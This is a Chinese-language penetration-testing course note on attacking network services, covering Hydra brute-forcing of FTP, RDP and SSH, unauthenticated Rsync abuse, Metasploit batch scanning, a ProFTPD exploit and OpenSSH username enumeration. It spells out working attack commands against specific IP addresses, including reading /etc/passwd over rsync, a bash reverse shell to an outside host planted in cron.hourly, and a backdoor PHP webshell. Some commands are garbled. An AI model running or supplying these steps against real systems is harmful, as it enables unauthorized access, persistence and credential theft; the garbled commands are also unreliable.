网络安全全栈培训笔记(57-服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批量扫描&口令拆解)

第57天 服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批量扫描&口令拆解

在这里插入图片描述
在这里插入图片描述

知识点:

1、服务攻防-远程控制&文件传输等
2、远程控制-RDP&RDP&弱口令&漏洞
3、文件传输-FTP&Rsyc&弱口令&漏洞

章节内容:

常见服务应用的安全测试:
1、配置不当-未授权访问
2、安全机制特定安全漏洞
3、安全机制-弱口令爆破攻击

前置知识:

应用服务安全测试流程:见图
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属数据库&文件传箱&通讯等
3、判断服务利用方式特定漏洞&未授权&弱口令等

演示案例:

口令猜解-Hydra-FTP&RDP&SSH
配置不当-未授权访问-Rsync文件备份
高端课程-直接搜哈-MSF&Fofaviewer
协议漏洞-应用软件-FTP&Proftpd搭建
协议漏洞-应用软件-SSH&libssh&Openssh

☐令猜解-Hydra-FTP&RDP&SSH

https://github.com/vanhauser-thc/thc-hydra
hydra是一个自动化的爆破工具,暴力破解弱密码,
是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可

-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-C使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-S大写,采用SSL链接
-s PORT 指定默认端口
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。

配置不当-未授权访问-Rsync文件备份

rsync是Linux下一款数据备份工具,支持通过rSnc协议、ssh协议进行远程文件传输。其
中rsynct协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密
码,我们将可以读写目标服务器文件。
判断:rsync rsync:∥123.58.236.76:45854/
利用:
-读取文件:rsync rsync:/123.58.236.76:45854/src/
-下载文件:rsync rsync:/123.58.236.76.45854/src/etc/passwd/
-上传文件:rsync-av passwd rsync:/123.58.236.76:45854/src/tmp/passwd
反弹shell:
1、获取信息:
rsync rsync://123.58.236.76:12177/src/etc/crontab /root/cron.txt
2.创建文件
touch shell
#!/bin/bash
/bin/bash-i>&/dev/tcp/47.94.236.117/55660>&1
chmod +x shell
3、上传文件
rsync -av shell rsync://123.58.236.76:12177/src/etc/cron.hourly
4、等待接受反弹
在这里插入图片描述

高端课程-直接搜哈-MSF&Fofaviewer

https://github.com/wgpsec/fofa_viewer
msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/root/ips.txt
set threads 10
run
思路:使用fofa查询端口为873的资产,使用msf批量扫描目的资产

协议漏同-应用软件-FTP&Proftpd搭建

https://github.com/tokx/exploit-CVE-2015-3306
python exploit.py --host 123.58.236.76–port 24967–path “/var/www/html/”
http://123:58.236:76.19758/backdoorphp?cmd=id

协议漏洞-应用软件-SSH&libssh&Openssh

openssh CVE-2014-0160CVE-2018-15473cve202015778
CVE-2014-0160版本很少
cve_2020_15778价值不高(需要普通用户账号密码,可以返回shell但是权限仍是普通用户)
环境效果:不可以ssh连接,可以使用scp
在这里插入图片描述

CVE-2018-15473-用户名枚举
https://github.com/Rhynorater/CVE-2018-15473-Exploit
pip3 install-r requirements.txt
pip3 install paramiko==2.4.1
python sshUsernameEnumExploit py–port 32013–userList examplelnput.txt
123.58.236.76
在这里插入图片描述

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-23 16:00:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-23 16:00:03       100 阅读
  3. 在Django里面运行非项目文件

    2024-01-23 16:00:03       82 阅读
  4. Python语言-面向对象

    2024-01-23 16:00:03       91 阅读

热门阅读

  1. MySQL之SQL与数据库简介

    2024-01-23 16:00:03       59 阅读
  2. MySQL笔记-information_schema库中COLUMNS表的一些笔记

    2024-01-23 16:00:03       49 阅读
  3. Vue3+Ts:实现paypal按钮

    2024-01-23 16:00:03       61 阅读
  4. MySQL in和exists的取舍

    2024-01-23 16:00:03       61 阅读
  5. 宝塔安装在指定目录

    2024-01-23 16:00:03       54 阅读
  6. 原神启动(递推,矩阵)

    2024-01-23 16:00:03       51 阅读
  7. springboot actuator 配置所有endpoints可以访问

    2024-01-23 16:00:03       49 阅读
  8. TestNG中的@AfterSuite注释

    2024-01-23 16:00:03       43 阅读
  9. 【python学习】网络编程1

    2024-01-23 16:00:03       55 阅读
  10. SpringCloud之Resilience4j相关配置信息

    2024-01-23 16:00:03       47 阅读